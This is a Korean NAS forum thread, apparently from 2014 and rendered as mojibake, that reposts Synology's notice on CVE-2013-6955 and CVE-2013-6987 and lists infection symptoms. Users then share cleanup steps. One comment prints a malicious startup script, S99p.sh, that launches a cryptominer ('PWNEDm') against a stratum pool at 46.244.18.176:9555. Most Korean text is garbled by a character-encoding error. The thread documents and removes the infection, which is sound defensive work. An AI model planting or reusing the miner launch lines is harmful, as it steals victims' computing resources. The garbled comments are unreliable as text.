ÃÖ±Ù ÇØÅ· °ü·ÃÀ¸·Î ½Ã³î·ÎÁö·ÎºÎÅÍÀÇ °øÁö¸ÞÀÏ

   Á¶È¸ 6875   Ãßõ 1    

DSM Important UpdateDear Synology users,

Synology¢ç?confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The followings are possible symptoms to appear on affected DiskStation and RackStation:

Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their namesAppearance of non-Synology folder:
An automatically created shared folder with the name ¡°startup¡±, or a non-Synology folder appearing under the path of ¡°/root/PWNED¡±Redirection of the Web Station:
¡°Index.php¡± is redirected to an unexpected pageAppearance of non-Synology CGI program:
Files with meaningless names exist under the path of ¡°/usr/syno/synoman¡±Appearance of non-Synology script file:
Non-Synology script files, such as?¡°S99p.sh¡±, appear under the path of ¡°/usr/syno/etc/rc.d¡±

If users identify any of above situation, they are strongly encouraged to do the following:

For DiskStation or RackStation running on DSM 4.3, please follow the instruction?here?to REINSTALL?DSM 4.3-3827For DiskStation or RackStation running on DSM 4.0, it¡¯s recommended to REINSTALL DSM 4.0-2259 or onward from Synology?Download CenterFor DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it¡¯s recommended to REINSTALL DSM 4.2-3243 or onward from Synology?Download Center

For other users who haven¡¯t encountered above symptoms, it is recommended to go to
DSM > Control Panel > DSM Update?page, update to versions above to protect DiskStation from malicious attacks.

Synology has taken immediate actions to fix vulnerability at the point of identifying malicious attacks. As proliferation of cybercrime and increasingly sophisticated malware evolves, Synology continues to casting resources mitigating threats and dedicates to providing the most reliable solutions for users. If users still notice their DiskStation behaving suspiciously after being upgraded to the latest DSM version, please contact?********@********.com.

Sincerely,
Synology Development Team

?Copyright ? 2014 Synology Inc. All Rights Reserved. All other product names and company names
or logos mentioned in the e-mail are the properties of their respective ownerswww.synology.comPrivacy Policy
벌써 50대
ªÀº±Û Àϼö·Ï ½ÅÁßÇÏ°Ô.
¿À³ª±â 2014-02
°ÅÀÇ ÀüºÎ ÇØ´ç»çÇ×ÀÌ À־ Å«ÀÏÀÌ³×¿ä ¤Ì.¤Ì; Á¤Ç°À» »ç¿ëÇÏÀÚ´Ï µ·°ú ½ºÆåÀÌ ¾Èµû¶óÁÖ°í..
ÀÏ´Ü ¾Æ·¡Ã³·³ ÇØÁÖ¸é CPU»ç¿ëÀ²À» µÇµ¹¸± ¼ö ÀÖ½À´Ï´Ù.

## S99p.sh¸¦ ã¾Æ¼­ ³»¿ë È®ÀÎÇÏ°í Áö¿ó´Ï´Ù. ³»¿ë¿¡¼­ È®ÀεǴ PWNED´Â ¼Ò½ÉÇÏ°Ô À̸§À» ¹Ù²å¾î¿ä.
> cd /
> find / -name S99p.sh
/usr/syno/etc.defaults/rc.d/S99p.sh
> cat /usr/syno/etc.defaults/rc.d/S99p.sh
#!/bin/sh
su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp
su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp
>mv PWNED PWNED_bak
>rm /usr/syno/etc.defaults/rc.d/S99p.sh

## CPU¸¦ Á¡°ÅÇÏ´Â ¹é±×¶ó¿îµå ÇÁ·Î¼¼½º¸¦ ã¾Æº¾´Ï´Ù.
>find /proc -name "stat" | xargs grep "httpd-log.pid"
## À§ °Ë»ö °á°ú¿¡¼­ ¸ÇÀ§ ÆÄÀÏ(PID)À» killÇÏ¸é ³ª¸ÓÁöµµ killµË´Ï´Ù.
>kill °Ë»öµÈ PID

¿øÃÊÀûÀÎ ÇØ°á¹æ¹ýÀ» ¾Æ½Ã´Â ´É·ÂÀÚ²²¼± Á¤º¸ °øÀ¯Á» ºÎŹµå¸³´Ï´Ù! (__)
     
°­¼ºÁø00 2014-02
º¸¾È±¸¸ÛÀÌ ÆÄÀϽºÅ×ÀÌ¼Ç ÂÊ cgi ¶ó°í ÇÏ´õ±º¿ä.

Á¤Ç° À¯Àú¶ó¸é. ÃֽŹöÁ¯ ¾÷µ¥ÀÌÆ® ÇÏ¸é °£´ÜÈ÷ ÇØ°áµÇÁö¸¸.
ÇØ³î »ç¿ëÁßÀ̶ó¸é ¾î¿ ¼ö ¾øÀÌ

¿ÜºÎÆ÷Æ® ¿ÀÇÂÀ» Æ÷±â Çϰųª.. ÆÄÀϽºÅ×À̼ÇÀ» Æ÷±âÇϰųª..
ÀÌ·¸°Ô µÑ Áß Çϳª´Â Æ÷±â Çؾ߸¸ ÇÕ´Ï´Ù.

-----
ÆÄÀϽºÅ×ÀÌ¼Ç ÀÛµ¿ ¸·´Â ¹æ¹ýÀº ¾Æ·¡ ±Û¿¡ ÀÖ½À´Ï´Ù.

http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988
          
±èÁØÀ¯ 2014-02
Á¤Ç° »ç¿ëÀÚ¶ó....
ÀÌö¿ì275 2014-02
¿ä±â ¿Ã¶ó¿Â cgi À̸§ ±³Ã¼ÇÏ´Â ¹æ¹ýÀ¸·Î ÀÏ´Ü È¸ÇÇÇß±¸¿ä. (Àú´Â imageSelector.cgi Çϳª¹Û¿¡ ÀÏÄ¡ÇÏ´Â°Ô ¾ø´õ±º¿ä 4.2¶ó¼­ ±×·±°¡?)

/usr/syno/etc.defaults/rc.d/S99p.sh ÆÄÀÏ
PWNED Æú´õ
lolz Æú´õ
/etc/rc.local ÆÄÀÏ

ÀÏ´ÜÀº ±×³É À̸§ ¹Ù²ã³ù³×¿ä.
¹ÚÁ¾·É 2014-02
¸¸¾à lolz ·Î °É·È´Ù¸é top µîÀ» ½ÇÇàÇÏ½Ã¸é ±× Æú´õ¿¡ ÀÖ´ø °É·Î ½ÇÇà µÇ´Â µí Çϱ⵵ Çϳ׿ä..
Æú´õ Áö¿ì°í cgi À̸§µé ¹Ù²Ù°í ¿ì¼± Àӽ÷ΠÇ߳׿ä. Àú´Â .. 4´ë µ¹¸®´Â ÁßÀε¥ ¾÷µ¥ÀÌÆ® ¾ÈÇß´ø°Ô °É¸°°Å °°´õ±º¿ä.
Àӽ÷ΠÇϱä ÇßÁö¸¸.. ¾ÆÁ÷µµ ºÒ¾ÈÇÕ´Ï´Ù.

ºÎÆà USB ¸¦ »õ·Î ÀÛ¼º Çϼż­ ÇÏ½Ã±æ ±ÇÇص帳´Ï´Ù. ¸ÞÀÎÀ¸·Î ¾²´ø °Ô ºÎÆÃÇÒ ¶§ º¸´Ï lolz ã´Â°Å °°´õ±º¿ä..
¿ì¼± ºÎÆà USB ºÎÅÍ »õ·Î ¸¸µå½Ã±æ....
     
¼Û°­¹Î 2014-02
¿Â°® rcÆÄÀÏ .profile¿¡ lolz°ü·Ã ½ºÅ©¸³Æ®µéÀÌ À¯ÀԵǾî ÀÖ´õ¶ó±¸¿ä
Àú´Â ¸®¼Ò½º ¸ð´ÏÅ͵µ ¾ÈµÇ°í Á¤»óÀûÀ¸·Î »ç¿ëÀÌ ºÒ°¡ÇÏ¿© À缳ġ Çß½À´Ï´Ù.


NAS
Á¦¸ñPage 56/304
2014-05   4581913   Á¤ÀºÁØ1
2015-12   1130517   ¹é¸Þ°¡
2017-05   6953   ÆËÀÌÁÁ¾Æ
2022-07   1986   Ǫ¸¥ÇØ¿ø
2014-02   4247   ¾È½ÂÇö
2014-12   9462   xpenology
2015-06   4087   ¿õÀ̵ÕÀÌ
2018-04   4226   ÅëÅë9
2020-10   3138   °Ü¿ï³²ÀÚ
2014-02   6876   ±èÁØÀ¯
2014-10   5751   °ûºÀÈ¿
2014-10   5987   ddyy
2016-07   6439   °³±¸Àï
2013-12   6919   ¾È½ÂÇö
2014-11   7037   ²Òµ¹ÀÌ
2014-12   18697   s±èÁ¾È­z
2015-10   8983   ¶Ñ²±µû¹ö¸®±â
2015-10   8840   Äè³²ÈÀÀÌ
2015-02   5761   ³­´Ù°õ
2015-08   5359   ·çÆÃ
2021-06   1379   ÄܽºÅºÆ¾
2015-03   8230   ÀÓ»ó°æ